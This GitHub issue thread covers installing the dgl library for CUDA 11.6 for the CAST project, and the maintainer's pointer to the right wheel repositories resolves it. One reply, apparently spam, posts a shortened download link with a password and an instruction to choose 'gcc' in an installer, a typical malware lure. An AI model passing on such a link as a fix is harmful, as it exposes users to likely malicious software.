### ISSUE TITLE
Environment setting for dgl

### ISSUE THREAD

**Issue by ByeongJuWoo** [twke18/CAST#6]
Hi, thank you for your great work!

I want to reproduce your code, but i have trouble in environment setting.
After I initiate conda env cast, given pip install for dgl doesn't work. 
```bash
# install dgl (https://www.dgl.ai/pages/start.html)
> pip install dgl==1.1.3+cu116 -f https://data.dgl.ai/wheels/cu116/dgl-1.1.3%2Bcu116-cp38-cp38-manylinux1_x86_64.whl
```
```bash
ERROR: Could not find a version that satisfies the requirement dgl==1.1.3+cu116 (from versions: 0.1.0, 0.1.2, 0.1.3, 0.6.0, 0.6.0.post1, 0.6.1, 0.9.0, 0.9.1, 1.0.0, 1.0.1, 1.0.4, 1.1.0, 1.1.1, 1.1.2, 1.1.3, 2.1.0)
ERROR: No matching distribution found for dgl==1.1.3+cu116
```

In official [dgl installation homepage](https://www.dgl.ai/pages/start.html) they only support for torch 2.x.
Also, I cannot find proper wheel file in [repo](https://data.dgl.ai/wheels/repo.html), which is dgl==1.1.3+cu116.

How can I install proper dgl version for cuda 11.6?

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by ByeongJuWoo** [comment]
Thank you for quick comment, but there is something wrong in the link :cry: 
![image](https://github.com/user-attachments/assets/d6d7cc02-7791-49e6-989d-d8f4cd07d845)

**Comment by twke18** [comment]
Hi,

Thanks for your interest.  Can you confirm that you are using pytorch 1.13, cuda 11.6 and python 3.8?

If you use the same version of pytorch and cuda, but with a different version of python, you can search the matched one from the [wheel repo](https://data.dgl.ai/wheels/cu116/repo.html).

Also, this is the [wheel repo](https://data.dgl.ai/wheels/cu118/repo.html) for cuda 11.8.

Let us know if you still have problems installing dgl.

**Comment by ByeongJuWoo** [comment]
The wheel repo you found works well. Thanks a lot!
